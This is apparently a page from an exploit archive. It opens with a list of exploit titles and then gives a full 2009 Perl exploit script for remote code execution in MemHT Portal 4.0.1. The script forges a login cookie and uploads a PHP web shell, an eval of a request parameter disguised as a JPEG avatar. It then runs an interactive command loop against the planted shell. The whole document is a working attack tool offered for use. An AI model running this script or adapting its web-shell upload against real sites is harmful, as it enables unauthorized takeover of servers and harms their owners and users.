477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
177 lines
3.7 KiB
Perl
Executable file
177 lines
3.7 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
# MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
|
|
# by yeat - staker[at]hotmail[dot]it
|
|
|
|
use Getopt::Std;
|
|
use Digest::MD5('md5_hex');
|
|
use LWP::UserAgent;
|
|
|
|
|
|
getopts('p:',\my %opts);
|
|
|
|
my ($host,$file,$id,$username,$password) = @ARGV;
|
|
|
|
my $http = new LWP::UserAgent;
|
|
my $u_agent = "Lynx (textmode)";
|
|
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);
|
|
|
|
|
|
Main::RunExploit();
|
|
|
|
|
|
# Main Package
|
|
|
|
package Main;
|
|
|
|
|
|
sub Usage {
|
|
|
|
return print <<EOF;
|
|
+--------------------------------------------------------------+
|
|
| MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit |
|
|
+--------------------------------------------------------------+
|
|
by yeat - staker[at]hotmail[dot]it
|
|
|
|
Usage: perl xpl.pl host/path file id user pass [OPTIONS]
|
|
host: target host and memht path
|
|
file: file to upload
|
|
user: valid username
|
|
pass: valid password
|
|
id: user id
|
|
|
|
Options:
|
|
|
|
-p [specify a proxy] [server]:[port]
|
|
|
|
Example:
|
|
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure
|
|
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure -p 213.151.89.109:80
|
|
|
|
EOF
|
|
|
|
}
|
|
|
|
|
|
sub RunExploit
|
|
{
|
|
if (defined $opts{p}) {
|
|
HTTP::Proxy($opts{p});
|
|
}
|
|
|
|
if (@ARGV < 5 || @ARGV > 7) {
|
|
Main::Usage();
|
|
}
|
|
else {
|
|
HTTP::UserAgent($u_agent);
|
|
MemHT::Login();
|
|
MemHT::Exploit($file);
|
|
}
|
|
}
|
|
|
|
|
|
|
|
|
|
# MemHT Exploit Package
|
|
|
|
package MemHT;
|
|
|
|
sub Exploit
|
|
{
|
|
my $resp;
|
|
my $file = shift(@_);
|
|
my $path = "/index.php?page=users&op=editProfile";
|
|
|
|
my $data = {
|
|
chg_email => 'yeat@doesntexist.net',
|
|
avatar => [
|
|
undef,
|
|
$file,
|
|
Content_Type => 'image/jpeg',
|
|
Content => '<?php error_reporting(E_ALL); eval($_REQUEST[\'cmd\']); ?>',
|
|
# Content => 'Here you can write everything :) this is an example!',
|
|
],
|
|
chg => 'true',
|
|
Submit => 'Modify',
|
|
};
|
|
|
|
my $send = $http->post('http://'.$host.$path,
|
|
$data,
|
|
Content_Type => 'multipart/form-data',
|
|
);
|
|
|
|
if ($send->as_string =~ m{logout}i) {
|
|
print "File Uploaded! / $host/images/avatar/uploaded/$file\n\n";
|
|
|
|
while (1) {
|
|
print "\n[yeat-PHPshell]:~# ";
|
|
chomp(my $content = <STDIN>);
|
|
$resp = HTTP::GET("$host/images/avatar/uploaded/$file?cmd=$content");
|
|
print $resp->content;
|
|
}
|
|
}
|
|
else {
|
|
print "Exploit Failed!\n";
|
|
exit;
|
|
}
|
|
}
|
|
|
|
|
|
sub Login
|
|
{
|
|
HTTP::Cookies($cookies);
|
|
my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
|
|
|
|
if ($response->content =~ /access denied/i) {
|
|
print "Login Failed!\n";
|
|
exit;
|
|
}
|
|
}
|
|
|
|
|
|
|
|
# HTTP Package
|
|
|
|
package HTTP;
|
|
|
|
|
|
sub Cookies
|
|
{
|
|
return $http->default_header('Cookie' => $_[0]);
|
|
}
|
|
|
|
sub UserAgent
|
|
{
|
|
return $http->agent($_[0]);
|
|
}
|
|
|
|
sub GET
|
|
{
|
|
if ($_[0] !~ m{^http://(.+?)$}i) {
|
|
return $http->get('http://'.$_[0]);
|
|
}
|
|
else {
|
|
return $http->get($_[0]);
|
|
}
|
|
}
|
|
|
|
sub POST
|
|
{
|
|
if ($_[0] !~ m{^http://(.+?)$}i) {
|
|
return $http->post('http://'.$_[0]);
|
|
}
|
|
else {
|
|
return $http->post($_[0]);
|
|
}
|
|
}
|
|
|
|
sub http_header
|
|
{
|
|
return $http->default_header($_[0]);
|
|
}
|
|
|
|
sub Proxy
|
|
{
|
|
return $http->proxy('http', 'http://'.$_[0]);
|
|
}
|
|
|
|
# milw0rm.com [2009-01-25]
|